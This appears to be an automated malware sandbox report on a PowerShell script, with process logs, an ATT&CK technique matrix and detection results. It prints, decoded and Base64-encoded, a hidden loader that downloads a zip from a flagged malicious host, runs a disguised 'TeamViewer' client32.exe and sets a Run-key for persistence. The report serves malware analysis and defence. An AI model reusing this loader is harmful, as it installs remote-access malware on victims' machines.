Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded cd $env:AppData; $link='https://figocoin.it/auth.php'; $rnum=Get-Random -minimum 5 -maximum 9; $rrnum=Get-Random -minimum 1024 -maximum 9999; $chrs='abcdefghijklmnopstuvwxyzABCDEFGHIJKLMNOPRSTUVWXYZ'; $rstr=''; $ran=New-Object System.Random; for ($i=0; $i -lt $rnum; $i++) {$rstr+=$chrs[$ran.next(0, $chrs.Length)]}; $rzip=$rstr+'.zip'; $path=$env:APPDATA+'\'+$rzip; $pzip=$env:APPDATA+'\TeamViewer_'+$rrnum; Start-BitsTransfer -Source $link -Destination $Path; expand-archive -path $path -destinationpath $pzip; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pzip; start client32.exe; $fstr=$pzip+'\client32.exe'; $rnm='TeamViewer_'+$rrnum; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $rnm -Value $fstr -PropertyType 'String';
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded cd $env:AppData; $link='https://figocoin.it/auth.php'; $rnum=Get-Random -minimum 5 -maximum 9; $rrnum=Get-Random -minimum 1024 -maximum 9999; $chrs='abcdefghijklmnopstuvwxyzABCDEFGHIJKLMNOPRSTUVWXYZ'; $rstr=''; $ran=New-Object System.Random; for ($i=0; $i -lt $rnum; $i++) {$rstr+=$chrs[$ran.next(0, $chrs.Length)]}; $rzip=$rstr+'.zip'; $path=$env:APPDATA+'\'+$rzip; $pzip=$env:APPDATA+'\TeamViewer_'+$rrnum; Start-BitsTransfer -Source $link -Destination $Path; expand-archive -path $path -destinationpath $pzip; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pzip; start client32.exe; $fstr=$pzip+'\client32.exe'; $rnm='TeamViewer_'+$rrnum; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $rnm -Value $fstr -PropertyType 'String';Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc ywbkacaajablag4adga6aeeacabwaeqayqb0ageaowagacqababpag4aawa9accaaab0ahqacabzadoalwavagyaaqbnag8aywbvagkabgauagkadaavageadqb0aggalgbwaggacaanadsaiaakahiabgb1ag0apqbhaguadaatafiayqbuagqabwbtacaalqbtagkabgbpag0adqbtacaanqagac0abqbhahgaaqbtahuabqagadkaowagacqacgbyag4adqbtad0arwblahqalqbsageabgbkag8abqagac0abqbpag4aaqbtahuabqagadeamaayadqaiaatag0ayqb4agkabqb1ag0aiaa5adkaoqa5adsaiaakagmaaabyahmapqanageaygbjagqazqbmagcaaabpagoaawbsag0abgbvahaacwb0ahuadgb3ahgaeqb6aeeaqgbdaeqarqbgaecasabjaeoaswbmae0atgbpafaaugbtafqavqbwafcawabzafoajwa7acaajabyahmadabyad0ajwanadsaiaakahiayqbuad0atgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4augbhag4azabvag0aowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqacgbuahuabqa7acaajabpacsakwapacaaewakahiacwb0ahiakwa9acqaywboahiacwbbacqacgbhag4algbuaguaeab0acgamaasacaajabjaggacgbzac4atablag4azwb0aggakqbdah0aowagacqacgb6agkacaa9acqacgbzahqacgaraccalgb6agkacaanadsaiaakahaayqb0aggapqakaguabgb2adoaqqbqafaarabbafqaqqaraccaxaanacsajabyahoaaqbwadsaiaakahaaegbpahaapqakaguabgb2adoaqqbqafaarabbafqaqqaraccaxabuaguayqbtafyaaqblahcazqbyaf8ajwaracqacgbyag4adqbtadsaiabtahqayqbyahqalqbcagkadabzafqacgbhag4acwbmaguacgagac0auwbvahuacgbjaguaiaakagwaaqbuagsaiaataeqazqbzahqaaqbuageadabpag8abgagacqauabhahqaaaa7acaazqb4ahaayqbuagqalqbhahiaywboagkadgblacaalqbwageadaboacaajabwageadaboacaalqbkaguacwb0agkabgbhahqaaqbvag4acabhahqaaaagacqacab6agkacaa7acaajabgae8atabead0arwblahqalqbjahqazqbtacaajabwahoaaqbwacaalqbgag8acgbjaguaowagacqargbpaewaraauageadab0ahiaaqbiahuadablahmapqanaegaaqbkagqazqbuaccaowagafiazqbtag8adgblac0asqb0aguabqagac0acabhahqaaaagacqacabhahqaaaa7acaaywbkacaajabwahoaaqbwadsaiabzahqayqbyahqaiabjagwaaqblag4adaazadialgblahgazqa7acaajabmahmadabyad0ajabwahoaaqbwacsajwbcagmababpaguabgb0admamgauaguaeablaccaowagacqacgbuag0apqanafqazqbhag0avgbpaguadwblahiaxwanacsajabyahiabgb1ag0aowagae4azqb3ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiaatafaayqb0aggaiaanaegaswbdafuaogbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuaccaiaatae4ayqbtaguaiaakahiabgbtacaalqbwageabab1aguaiaakagyacwb0ahiaiaagac0auabyag8acablahiadab5afqaeqbwaguaiaanafmadabyagkabgbnaccaowa=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc ywbkacaajablag4adga6aeeacabwaeqayqb0ageaowagacqababpag4aawa9accaaab0ahqacabzadoalwavagyaaqbnag8aywbvagkabgauagkadaavageadqb0aggalgbwaggacaanadsaiaakahiabgb1ag0apqbhaguadaatafiayqbuagqabwbtacaalqbtagkabgbpag0adqbtacaanqagac0abqbhahgaaqbtahuabqagadkaowagacqacgbyag4adqbtad0arwblahqalqbsageabgbkag8abqagac0abqbpag4aaqbtahuabqagadeamaayadqaiaatag0ayqb4agkabqb1ag0aiaa5adkaoqa5adsaiaakagmaaabyahmapqanageaygbjagqazqbmagcaaabpagoaawbsag0abgbvahaacwb0ahuadgb3ahgaeqb6aeeaqgbdaeqarqbgaecasabjaeoaswbmae0atgbpafaaugbtafqavqbwafcawabzafoajwa7acaajabyahmadabyad0ajwanadsaiaakahiayqbuad0atgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4augbhag4azabvag0aowagagyabwbyacaakaakagkapqawadsaiaakagkaiaatagwadaagacqacgbuahuabqa7acaajabpacsakwapacaaewakahiacwb0ahiakwa9acqaywboahiacwbbacqacgbhag4algbuaguaeab0acgamaasacaajabjaggacgbzac4atablag4azwb0aggakqbdah0aowagacqacgb6agkacaa9acqacgbzahqacgaraccalgb6agkacaanadsaiaakahaayqb0aggapqakaguabgb2adoaqqbqafaarabbafqaqqaraccaxaanacsajabyahoaaqbwadsaiaakahaaegbpahaapqakaguabgb2adoaqqbqafaarabbafqaqqaraccaxabuaguayqbtafyaaqblahcazqbyaf8ajwaracqacgbyag4adqbtadsaiabtahqayqbyahqalqbcagkadabzafqacgbhag4acwbmaguacgagac0auwbvahuacgbjaguaiaakagwaaqbuagsaiaataeqazqbzahqaaqbuageadabpag8abgagacqauabhahqaaaa7acaazqb4ahaayqbuagqalqbhahiaywboagkadgblacaalqbwageadaboacaajabwageadaboacaalqbkaguacwb0agkabgbhahqaaqbvag4acabhahqaaaagacqacab6agkacaa7acaajabgae8atabead0arwblahqalqbjahqazqbtacaajabwahoaaqbwacaalqbgag8acgbjaguaowagacqargbpaewaraauageadab0ahiaaqbiahuadablahmapqanaegaaqbkagqazqbuaccaowagafiazqbtag8adgblac0asqb0aguabqagac0acabhahqaaaagacqacabhahqaaaa7acaaywbkacaajabwahoaaqbwadsaiabzahqayqbyahqaiabjagwaaqblag4adaazadialgblahgazqa7acaajabmahmadabyad0ajabwahoaaqbwacsajwbcagmababpaguabgb0admamgauaguaeablaccaowagacqacgbuag0apqanafqazqbhag0avgbpaguadwblahiaxwanacsajabyahiabgb1ag0aowagae4azqb3ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiaatafaayqb0aggaiaanaegaswbdafuaogbcafmatwbgafqavwbbafiarqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwbcaemadqbyahiazqbuahqavgblahiacwbpag8abgbcafiadqbuaccaiaatae4ayqbtaguaiaakahiabgbtacaalqbwageabab1aguaiaakagyacwb0ahiaiaagac0auabyag8acablahiadab5afqaeqbwaguaiaanafmadabyagkabgbnaccaowa=Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABUAGUAYQBtAFYAaQBlAHcAZQByAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAFQAZQBhAG0AVgBpAGUAdwBlAHIAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
1
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts2
PowerShell
Boot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets2
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
6471bc8dac218.ps10%ReversingLabs
6471bc8dac218.ps15%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.micro0%URL Reputationsafe
http://crl.micro0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://figocoin.it/auth.php18%VirustotalBrowse
https://figocoin.it/auth.php100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://crl.micropowershell.exe, 00000002.00000003.410792964.0000023CABB97000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
